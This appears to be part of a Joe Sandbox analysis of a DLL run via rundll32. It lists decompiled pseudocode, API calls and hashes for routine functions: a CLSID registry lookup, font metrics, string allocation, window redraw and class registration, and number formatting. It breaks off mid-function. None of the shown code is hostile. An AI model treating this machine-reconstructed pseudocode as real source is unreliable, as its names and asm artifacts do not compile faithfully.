                                                                        			E1002583A(void* _a4, intOrPtr _a8) {
				void* _v8;
				void* _v12;
				int _v16;
				char* _v20;
				int _v24;
				void* __ebx;
				void* __edi;
				signed int _t35;
				void* _t37;
				void* _t42;
				int* _t43;

				_t43 = 0;
				_v12 = 0;
				_v20 = E100017D0(_a8, 0x104);
				_v16 = 0x104;
				_t42 = RegOpenKeyA;
				_v24 = 0;
				if(RegOpenKeyA(0x80000000, ?str?,  &_v12) == 0) {
					_push(_t37);
					_v8 = 0;
					if(RegOpenKeyA(_v12, _a4,  &_v8) == 0) {
						_a4 = 0;
						if(RegOpenKeyA(_v8, "InProcServer32",  &_a4) == 0) {
							_t35 = RegQueryValueExA(_a4, 0x1003da51, 0,  &_v24, _v20,  &_v16);
							asm("sbb esi, esi");
							_t43 =  ~_t35 + 1;
							RegCloseKey(_a4);
						}
						RegCloseKey(_v8);
					}
					RegCloseKey(_v12);
					_pop(_t37);
				}
				E10006CE2(_t37, _a8, _t42, 0xffffffff);
				return _t43;
			}














                                                                        0x1002584a
                                                                        0x1002584d
                                                                        0x10025855
                                                                        0x10025861
                                                                        0x10025864
                                                                        0x1002586f
                                                                        0x10025876
                                                                        0x10025878
                                                                        0x10025880
                                                                        0x10025890
                                                                        0x1002589e
                                                                        0x100258a5
                                                                        0x100258bb
                                                                        0x100258c8
                                                                        0x100258ca
                                                                        0x100258cb
                                                                        0x100258cb
                                                                        0x100258d0
                                                                        0x100258d0
                                                                        0x100258d5
                                                                        0x100258d7
                                                                        0x100258d7
                                                                        0x100258dd
                                                                        0x100258e7

                                                                        APIs
                                                                        • RegOpenKeyA.ADVAPI32(80000000,CLSID,?), ref: 10025872
                                                                        • RegOpenKeyA.ADVAPI32(?,?,?), ref: 10025886
                                                                        • RegOpenKeyA.ADVAPI32(?,InProcServer32,?), ref: 100258A1
                                                                        • RegQueryValueExA.ADVAPI32(?,1003DA51,00000000,?,?,?), ref: 100258BB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258CB
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D0
                                                                        • RegCloseKey.ADVAPI32(?), ref: 100258D5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpen$QueryValue
                                                                        • String ID: CLSID$InProcServer32
                                                                        • API String ID: 3523390698-323508013
                                                                        • Opcode ID: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction ID: 98c4733b419a9a9fcc8d3b331f1c0e54a211d8c73680194401ba1897b1518396
                                                                        • Opcode Fuzzy Hash: 0f9c6b5e3f4a76f5fb44a6b70cf5269a04b4aae784ef91a0774247bb7487627f
                                                                        • Instruction Fuzzy Hash: A511297680012DBFEF02EFA5CC80DEEBBB9EF446A0F114122FA05A6150D7719B51DBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10036531 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 60COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10036531() {
				struct HWND__* _v4;
				void* _v68;
				void* _v76;
				int _t4;
				int _t10;
				struct HDC__* _t15;
				void* _t18;

				_t4 =  *0x1004b8cc; // 0xffffffff
				if(_t4 == 0xffffffff) {
					_t15 = GetDC(0);
					_v4 = 0;
					_t18 = CreateFontA(GetSystemMetrics(0x48), 0, 0, 0, 0x190, 0, 0, 0, 2, 0, 0, 0, 0, "Marlett");
					if(_t18 != 0) {
						_v68 = SelectObject(_t15, _t18);
					}
					GetCharWidthA(_t15, 0x36, 0x36, 0x1004b8cc);
					if(_t18 != 0) {
						SelectObject(_t15, _v76);
						DeleteObject(_t18);
					}
					ReleaseDC(0, _t15);
					_t10 =  *0x1004b8cc; // 0xffffffff
					return _t10;
				}
				return _t4;
			}










                                                                        0x10036532
                                                                        0x1003653a
                                                                        0x10036561
                                                                        0x10036563
                                                                        0x1003657a
                                                                        0x1003657e
                                                                        0x10036584
                                                                        0x10036584
                                                                        0x10036592
                                                                        0x1003659a
                                                                        0x100365a1
                                                                        0x100365a4
                                                                        0x100365a4
                                                                        0x100365ac
                                                                        0x100365b2
                                                                        0x00000000
                                                                        0x100365ba
                                                                        0x100365bc

                                                                        APIs
                                                                        • GetDC.USER32(00000000), ref: 10036543
                                                                        • GetSystemMetrics.USER32 ref: 10036567
                                                                        • CreateFontA.GDI32(00000000,?,?,?,?,?,10036A10,?,?,?,?,?,?,?), ref: 1003656E
                                                                        • SelectObject.GDI32(00000000,00000000), ref: 10036582
                                                                        • GetCharWidthA.GDI32(00000000,00000036,00000036,1004B8CC), ref: 10036592
                                                                        • SelectObject.GDI32(00000000,?), ref: 100365A1
                                                                        • DeleteObject.GDI32(00000000), ref: 100365A4
                                                                        • ReleaseDC.USER32 ref: 100365AC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Object$Select$CharCreateDeleteFontMetricsReleaseSystemWidth
                                                                        • String ID: Marlett
                                                                        • API String ID: 1397664628-3688754224
                                                                        • Opcode ID: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction ID: 1088ce7175f154466d6028c012866e6bff604f09a65bd199e6d5657c5750c08b
                                                                        • Opcode Fuzzy Hash: 02a284a0c2a362a437aa0b11f12343519aacb4f4528957fd96303176c2f861e5
                                                                        • Instruction Fuzzy Hash: 5D014071542634BFE2269B668C8CD9B7FACEF467E5F104518F209DA152CB614900CBB4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1003982F Relevance: 15.2, APIs: 10, Instructions: 181memorystringCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 53%
                                                                        			E1003982F(void* __ecx) {
				intOrPtr _t52;
				intOrPtr _t53;
				void* _t57;
				CHAR* _t60;
				CHAR* _t88;
				CHAR* _t89;
				void* _t102;
				CHAR* _t103;
				CHAR* _t105;
				CHAR* _t106;
				CHAR* _t107;
				void* _t111;
				short* _t112;
				void* _t122;
				void* _t127;
				void* _t129;
				void* _t131;

				_t127 = _t129 - 0x8c;
				_t52 =  *0x1004c470; // 0x1bfbe703
				 *((intOrPtr*)(_t127 + 0x88)) = _t52;
				_t53 =  *0x1004b0a0(_t111, _t122, _t102);
				_t112 =  *((intOrPtr*)(_t127 + 0x94));
				 *((intOrPtr*)(_t127 - 0x7c)) = _t53;
				E10011C50(_t112, 0, 0x20);
				_t103 =  *(_t127 + 0x98);
				_t131 = _t129 - 0x10c + 0xc;
				_t109 = _t103;
				 *(_t127 - 0x80) = _t127 - 0x78;
				if(E100244DE(_t103, 0x100410f8) == 0) {
					_t109 = _t103;
					_t57 = E100244DE(_t103, 0x1003d114);
					_push(0x100);
					_push(_t127 - 0x78);
					if(_t57 == 0) {
						_push(0xf108);
						E100245D3();
						 *_t112 = 0xf108;
						L12:
						_t60 = 0;
						if( *(_t127 - 0x80) == 0) {
							L14:
							__imp__#2(_t60);
							 *(_t112 + 8) = _t60;
							if( *(_t112 + 4) == 0) {
								_t106 =  *(E100373B5() + 0x10);
								if(_t106 != 0) {
									_t115 = lstrlenA(_t106) + 1;
									E10010B20(lstrlenA(_t106) + 0x00000001 + lstrlenA(_t106) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t106, _t115,  *((intOrPtr*)(_t127 - 0x7c)));
									_t112 =  *((intOrPtr*)(_t127 + 0x94));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 4) = _t60;
							}
							if( *(_t112 + 0xc) == 0 &&  *(_t112 + 0x10) != 0) {
								_t105 =  *( *((intOrPtr*)(E100373B5() + 4)) + 0x60);
								if(_t105 != 0) {
									_t126 = lstrlenA(_t105) + 1;
									E10010B20(lstrlenA(_t105) + 0x00000001 + lstrlenA(_t105) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
									_t60 = E100067FA(_t131, _t105, _t126,  *((intOrPtr*)(_t127 - 0x7c)));
								} else {
									_t60 = 0;
								}
								__imp__#2(_t60);
								 *(_t112 + 0xc) = _t60;
							}
							return E100117AE(_t60,  *((intOrPtr*)(_t127 + 0x88)));
						}
						L13:
						_t117 = lstrlenA( *(_t127 - 0x80)) + 1;
						E10010B20(lstrlenA( *(_t127 - 0x80)) + 0x00000001 + lstrlenA( *(_t127 - 0x80)) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t60 = E100067FA(_t131,  *(_t127 - 0x80), _t117,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
						goto L14;
					}
					_push(0xf10a);
					E100245D3();
					 *_t112 = 0xf10a;
					goto L13;
				}
				 *(_t127 - 0x80) = _t103[0xc];
				 *_t112 = _t103[8];
				 *(_t112 + 0x10) = _t103[0x10];
				 *(_t112 + 0x1c) = _t103[0x1c];
				_t88 = _t103[0x14];
				 *(_t127 + 0x98) = _t88;
				if( *((intOrPtr*)(_t88 - 0xc)) != 0) {
					if(_t88 != 0) {
						_t121 = lstrlenA(_t88) + 1;
						E10010B20(lstrlenA(_t88) + 0x00000001 + lstrlenA(_t88) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t88 = E100067FA(_t131,  *(_t127 + 0x98), _t121,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t88);
					 *(_t112 + 0xc) = _t88;
				}
				_t107 = _t103[0x18];
				_t89 = 0;
				if( *((intOrPtr*)(_t107 - 0xc)) != 0) {
					if(_t107 != 0) {
						_t119 = lstrlenA(_t107) + 1;
						E10010B20(lstrlenA(_t107) + 0x00000001 + lstrlenA(_t107) + 0x00000001 + 0x00000003 & 0xfffffffc, _t109);
						_t89 = E100067FA(_t131, _t107, _t119,  *((intOrPtr*)(_t127 - 0x7c)));
						_t112 =  *((intOrPtr*)(_t127 + 0x94));
					}
					__imp__#2(_t89);
					 *(_t112 + 4) = _t89;
				}
				goto L12;
			}




















                                                                        0x10039830
                                                                        0x1003983d
                                                                        0x10039845
                                                                        0x1003984b
                                                                        0x10039851
                                                                        0x1003985c
                                                                        0x1003985f
                                                                        0x10039864
                                                                        0x1003986a
                                                                        0x10039875
                                                                        0x10039877
                                                                        0x10039887
                                                                        0x10039935
                                                                        0x10039937
                                                                        0x1003993e
                                                                        0x10039946
                                                                        0x10039947
                                                                        0x1003995a
                                                                        0x1003995f
                                                                        0x10039964
                                                                        0x10039969
                                                                        0x10039969
                                                                        0x1003996e
                                                                        0x1003999b
                                                                        0x1003999c
                                                                        0x100399a6
                                                                        0x100399a9
                                                                        0x100399b0
                                                                        0x100399b5
                                                                        0x100399c0
                                                                        0x100399ca
                                                                        0x100399d7
                                                                        0x100399dc
                                                                        0x100399b7
                                                                        0x100399b7
                                                                        0x100399b7
                                                                        0x100399e3
                                                                        0x100399e9
                                                                        0x100399e9
                                                                        0x100399f0
                                                                        0x10039a00
                                                                        0x10039a05
                                                                        0x10039a10
                                                                        0x10039a1a
                                                                        0x10039a27
                                                                        0x10039a07
                                                                        0x10039a07
                                                                        0x10039a07
                                                                        0x10039a2d
                                                                        0x10039a33
                                                                        0x10039a33
                                                                        0x10039a51
                                                                        0x10039a51
                                                                        0x10039970
                                                                        0x10039977
                                                                        0x10039981
                                                                        0x10039990
                                                                        0x10039995
                                                                        0x00000000
                                                                        0x10039995
                                                                        0x10039949
                                                                        0x1003994e
                                                                        0x10039953
                                                                        0x00000000
                                                                        0x10039953
                                                                        0x10039890
                                                                        0x10039897
                                                                        0x1003989d
                                                                        0x100398a3
                                                                        0x100398a6
                                                                        0x100398ad
                                                                        0x100398b3
                                                                        0x100398b7
                                                                        0x100398be
                                                                        0x100398c8
                                                                        0x100398da
                                                                        0x100398df
                                                                        0x100398df
                                                                        0x100398e6
                                                                        0x100398ec
                                                                        0x100398ec
                                                                        0x100398ef
                                                                        0x100398f2
                                                                        0x100398f7
                                                                        0x100398fb
                                                                        0x10039902
                                                                        0x1003990c
                                                                        0x10039919
                                                                        0x1003991e
                                                                        0x1003991e
                                                                        0x10039925
                                                                        0x1003992b
                                                                        0x1003992b
                                                                        0x00000000

                                                                        APIs
                                                                        • lstrlenA.KERNEL32(?,100410F8), ref: 100398BA
                                                                          • Part of subcall function 100067FA: MultiByteToWideChar.KERNEL32(?,00000000,?,000000FF,?,?), ref: 1000681C
                                                                        • SysAllocString.OLEAUT32(?), ref: 100398E6
                                                                        • lstrlenA.KERNEL32(?,100410F8), ref: 100398FE
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 10039925
                                                                        • lstrlenA.KERNEL32(?,0000F108,?,00000100,1003D114,100410F8), ref: 10039973
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 1003999C
                                                                        • lstrlenA.KERNEL32(?), ref: 100399BC
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 100399E3
                                                                        • lstrlenA.KERNEL32(?), ref: 10039A0C
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 10039A2D
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: AllocStringlstrlen$ByteCharMultiWide
                                                                        • String ID:
                                                                        • API String ID: 2903237683-0
                                                                        • Opcode ID: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                        • Instruction ID: 094128f662b1ec739eea3e3cde0adae16dde2bfe5a7d45c4af97d4efa71afc42
                                                                        • Opcode Fuzzy Hash: d0e283d36d7e8a4e4201feedb9b32d85caebebb8c09a47d8d95a8ace7938a35f
                                                                        • Instruction Fuzzy Hash: A251A476900619EFDB20DF78CC85B8AB7B8FF09255F108526F519CB242DB74E950CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1002F6AD Relevance: 15.1, APIs: 10, Instructions: 96COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E1002F6AD(void* __ecx, int _a4) {
				int _v8;
				struct tagRECT _v24;
				long _t39;
				int _t42;
				int _t43;
				int _t62;
				int _t66;
				void* _t68;
				long _t69;
				int _t71;

				_t69 = _a4;
				_t68 = __ecx;
				_t39 = DefWindowProcA( *(__ecx + 0x1c), 0x46, 0, _t69);
				if(( *(_t69 + 0x18) & 0x00000001) == 0) {
					GetWindowRect( *(_t68 + 0x1c),  &_v24);
					_t42 = _a4;
					_t66 =  *(_t42 + 0x10);
					_t71 = _v24.right - _v24.left;
					_t62 = _v24.bottom - _v24.top;
					_t43 =  *(_t42 + 0x14);
					_v8 = _t66;
					_a4 = _t43;
					if(_t66 != _t71 && ( *(_t68 + 0x7d) & 0x00000004) != 0) {
						SetRect( &_v24, _t66 -  *0x1004efa0, 0, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, _t71 -  *0x1004efa0, 0, _t71, _a4);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						_t66 = _v8;
						_t43 = _a4;
					}
					if(_t43 != _t62 && ( *(_t68 + 0x7d) & 0x00000008) != 0) {
						SetRect( &_v24, 0, _t43 -  *0x1004efa4, _t66, _t43);
						InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
						SetRect( &_v24, 0, _t62 -  *0x1004efa4, _v8, _t62);
						_t43 = InvalidateRect( *(_t68 + 0x1c),  &_v24, 1);
					}
					return _t43;
				}
				return _t39;
			}













                                                                        0x1002f6b4
                                                                        0x1002f6bb
                                                                        0x1002f6c2
                                                                        0x1002f6cc
                                                                        0x1002f6da
                                                                        0x1002f6e0
                                                                        0x1002f6e6
                                                                        0x1002f6e9
                                                                        0x1002f6ef
                                                                        0x1002f6f4
                                                                        0x1002f6f7
                                                                        0x1002f6fa
                                                                        0x1002f6fd
                                                                        0x1002f714
                                                                        0x1002f723
                                                                        0x1002f73a
                                                                        0x1002f749
                                                                        0x1002f74f
                                                                        0x1002f752
                                                                        0x1002f752
                                                                        0x1002f757
                                                                        0x1002f774
                                                                        0x1002f77f
                                                                        0x1002f796
                                                                        0x1002f7a1
                                                                        0x1002f7a1
                                                                        0x00000000
                                                                        0x1002f7a7
                                                                        0x1002f7ab

                                                                        APIs
                                                                        • DefWindowProcA.USER32(?,00000046,00000000,?), ref: 1002F6C2
                                                                        • GetWindowRect.USER32 ref: 1002F6DA
                                                                        • SetRect.USER32 ref: 1002F714
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F723
                                                                        • SetRect.USER32 ref: 1002F73A
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F749
                                                                        • SetRect.USER32 ref: 1002F774
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F77F
                                                                        • SetRect.USER32 ref: 1002F796
                                                                        • InvalidateRect.USER32(?,?,00000001), ref: 1002F7A1
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$Invalidate$Window$Proc
                                                                        • String ID:
                                                                        • API String ID: 570070710-0
                                                                        • Opcode ID: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction ID: 759c21b255db7c4f0b51d9d2c83ad8eda26887521645a94a827a2b7369984522
                                                                        • Opcode Fuzzy Hash: c01845c7316c7950b7ef2fd5e5f7f0b699cb6ea0eaa739eb132b7bf5853a6ab6
                                                                        • Instruction Fuzzy Hash: C631C972900259BFEB01DFA5DD88FAE7BB8EB04344F504125FA01AB5A1D770AE54CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 10020B9B Relevance: 15.1, APIs: 10, Instructions: 81stringregistryCOMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 100%
                                                                        			E10020B9B() {
				signed int _t39;
				CHAR* _t43;
				int _t44;
				WNDCLASSA* _t63;
				void* _t71;
				void* _t73;

				E10011BF0(0x1003a552, _t71);
				_t63 =  *(_t71 + 8);
				 *((intOrPtr*)(_t71 - 0x10)) = _t73 - 0x38;
				if(GetClassInfoA(_t63->hInstance, _t63->lpszClassName, _t71 - 0x40) == 0) {
					if(RegisterClassA(_t63) == 0) {
						L5:
						_t39 = 0;
					} else {
						 *(_t71 - 0x18) = 1;
						if( *((char*)(E100373B5() + 0x14)) == 0) {
							L10:
							_t39 =  *(_t71 - 0x18);
						} else {
							E10037A1B(1);
							 *(_t71 - 4) =  *(_t71 - 4) & 0x00000000;
							_t43 = E100373B5() + 0x34;
							 *(_t71 - 0x14) = _t43;
							_t44 = lstrlenA(_t43);
							_t13 = lstrlenA(_t63->lpszClassName) + 2; // 0x2
							if(_t44 + _t13 < 0x1000) {
								 *(_t71 + 8) = lstrlenA( *(_t71 - 0x14));
								if( *(_t71 + 8) + lstrlenA(_t63->lpszClassName) + 2 >= 0x1000) {
									 *(_t71 - 0x18) =  *(_t71 - 0x18) & 0x00000000;
									UnregisterClassA(_t63->lpszClassName, _t63->hInstance);
								} else {
									lstrcatA( *(_t71 - 0x14), _t63->lpszClassName);
									 *(_t71 + 0xa) = 0xa;
									 *((char*)(_t71 + 0xb)) = 0;
									lstrcatA( *(_t71 - 0x14), _t71 + 0xa);
								}
								 *(_t71 - 4) =  *(_t71 - 4) | 0xffffffff;
								E10037A7E(1);
								goto L10;
							} else {
								goto L5;
							}
						}
					}
				} else {
					_t39 = 1;
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t71 - 0xc));
				return _t39;
			}









                                                                        0x10020ba0
                                                                        0x10020bab
                                                                        0x10020bae
                                                                        0x10020bc3
                                                                        0x10020bd7
                                                                        0x10020c20
                                                                        0x10020c20
                                                                        0x10020bd9
                                                                        0x10020bdc
                                                                        0x10020be8
                                                                        0x10020c78
                                                                        0x10020c78
                                                                        0x10020bee
                                                                        0x10020bef
                                                                        0x10020bf4
                                                                        0x10020c03
                                                                        0x10020c07
                                                                        0x10020c0a
                                                                        0x10020c13
                                                                        0x10020c1e
                                                                        0x10020c2c
                                                                        0x10020c3a
                                                                        0x10020c60
                                                                        0x10020c67
                                                                        0x10020c3c
                                                                        0x10020c48
                                                                        0x10020c51
                                                                        0x10020c55
                                                                        0x10020c59
                                                                        0x10020c59
                                                                        0x10020c6d
                                                                        0x10020c73
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10020c1e
                                                                        0x10020be8
                                                                        0x10020bc5
                                                                        0x10020bc7
                                                                        0x10020bc7
                                                                        0x10020c80
                                                                        0x10020c89

                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.438224128.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000003.00000002.438218556.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438269645.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438284622.000000001004B000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438290903.0000000010051000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        • Associated: 00000003.00000002.438363852.000000001009A000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd
                                                                        Similarity
                                                                        • API ID: Classlstrlen$H_prologInfoRegister
                                                                        • String ID:
                                                                        • API String ID: 3690589370-0
                                                                        • Opcode ID: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction ID: 82e8c60a7f039037d0512a7f8540e8a50fdd43c9c42e3a44aee07f30fd402b66
                                                                        • Opcode Fuzzy Hash: fe016acf8cf746c9096719a1f6c6fcdbcde4f7b63f1b4234d94ae7eba108fb1e
                                                                        • Instruction Fuzzy Hash: 6B31AE75904219AFDB12DFA0CD85BADBFB9FF04355F104516F805A6162C734AA10CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 1001BC3A Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 228COMMON
                                                                        Download Yara Rule
                                                                        C-Code - Quality: 73%
                                                                        			E1001BC3A(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed short* _a24) {
				intOrPtr _v8;
				char _v9;
				signed int _v10;
				signed int _v14;
				signed int _v18;
				signed short _v20;
				char _v21;
				char _v22;
				char _v23;
				char _v24;
				char _v25;
				char _v26;
				char _v27;
				char _v28;
				char _v29;
				char _v30;
				char _v31;
				char _v32;
				char _v44;
				signed int _v48;
				signed short* _v52;
				intOrPtr _t87;
				signed int _t88;
				signed short* _t99;
				intOrPtr* _t100;
				signed int _t101;
				signed short _t103;
				signed int _t105;
				signed short* _t131;
				signed int _t133;
				signed int _t139;
				signed short* _t141;
				signed short _t149;
				signed int _t151;
				signed int _t152;
				signed int _t159;
				signed int _t161;
				signed int _t164;
				void* _t165;
				void* _t166;

				_t87 =  *0x1004c470; // 0x1bfbe703
				_v8 = _t87;
				_t88 = _a12;
				_t131 = _a24;
				_t133 = _t88 & 0x00008000;
				_v32 = 0xcc;
				_v31 = 0xcc;
				_v30 = 0xcc;
				_v29 = 0xcc;
				_v28 = 0xcc;
				_v27 = 0xcc;
				_v26 = 0xcc;
				_v25 = 0xcc;
				_v24 = 0xcc;
				_v23 = 0xcc;
				_v22 = 0xfb;
				_v21 = 0x3f;
				_v48 = 1;
				_t149 = _t88 & 0x00007fff;
				if(_t133 == 0) {
					_t131[1] = 0x20;
				} else {
					_t131[1] = 0x2d;
				}
				_t151 = _a8;
				if(_t149 != 0 || _t151 != 0 || _a4 != _t151) {
					if(_t149 != 0x7fff) {
						_t90 = _t149 & 0x0000ffff;
						_v20 = _v20 & 0x00000000;
						_v18 = _a4;
						_t159 = (((_t149 & 0x0000ffff) >> 8) + (_t151 >> 0x18) * 2) * 0x4d + _t90 * 0x4d10 - 0x134312f4 >> 0x10;
						_v10 = _t149;
						_v14 = _t151;
						E1001C383(_t131, _t151, _t159,  &_v20,  ~_t159, 1);
						_t166 = _t165 + 0xc;
						__eflags = _v10 - 0x3fff;
						if(_v10 >= 0x3fff) {
							_t159 = _t159 + 1;
							__eflags = _t159;
							E1001C151(_t131, _t151, _t159,  &_v20,  &_v32);
						}
						__eflags = _a20 & 0x00000001;
						_t152 = _a16;
						 *_t131 = _t159;
						if((_a20 & 0x00000001) == 0) {
							L27:
							__eflags = _t152 - 0x15;
							if(_t152 > 0x15) {
								_t152 = 0x15;
							}
							_t161 = (_v10 & 0x0000ffff) - 0x3ffe;
							_t52 =  &_v10;
							 *_t52 = _v10 & 0x00000000;
							__eflags =  *_t52;
							_a12 = 8;
							do {
								E1001B6CD( &_v20);
								_t56 =  &_a12;
								 *_t56 = _a12 - 1;
								__eflags =  *_t56;
							} while ( *_t56 != 0);
							__eflags = _t161;
							if(_t161 < 0) {
								_t164 =  ~_t161 & 0x000000ff;
								__eflags = _t164;
								if(_t164 > 0) {
									do {
										E1001B6FB( &_v20);
										_t164 = _t164 - 1;
										__eflags = _t164;
									} while (_t164 != 0);
								}
							}
							_t59 = _t152 + 1; // 0xcd
							_t139 = _t59;
							__eflags = _t139;
							_t99 =  &(_t131[2]);
							_v52 = _t99;
							if(_t139 > 0) {
								_a12 = _t139;
								do {
									asm("movsd");
									asm("movsd");
									asm("movsd");
									E1001B6CD( &_v20);
									E1001B6CD( &_v20);
									E1001B66F(__eflags,  &_v20,  &_v44);
									E1001B6CD( &_v20);
									_t166 = _t166 + 0x14;
									_v52 =  &(_v52[0]);
									_t74 =  &_a12;
									 *_t74 = _a12 - 1;
									__eflags =  *_t74;
									 *_v52 = _v9 + 0x30;
									_v9 = 0;
								} while ( *_t74 != 0);
								_t99 = _v52;
							}
							_t100 = _t99 - 1;
							_t101 = _t100 - 1;
							__eflags =  *_t100 - 0x35;
							_t141 =  &(_t131[2]);
							if( *_t100 < 0x35) {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
									__eflags =  *_t101 - 0x30;
									if( *_t101 == 0x30) {
										_t101 = _t101 - 1;
										__eflags = _t101;
										continue;
									}
									break;
								}
								__eflags = _t101 - _t141;
								if(_t101 >= _t141) {
									goto L46;
								} else {
									 *_t141 = 0x30;
									goto L54;
								}
							} else {
								while(1) {
									__eflags = _t101 - _t141;
									if(_t101 < _t141) {
										break;
									}
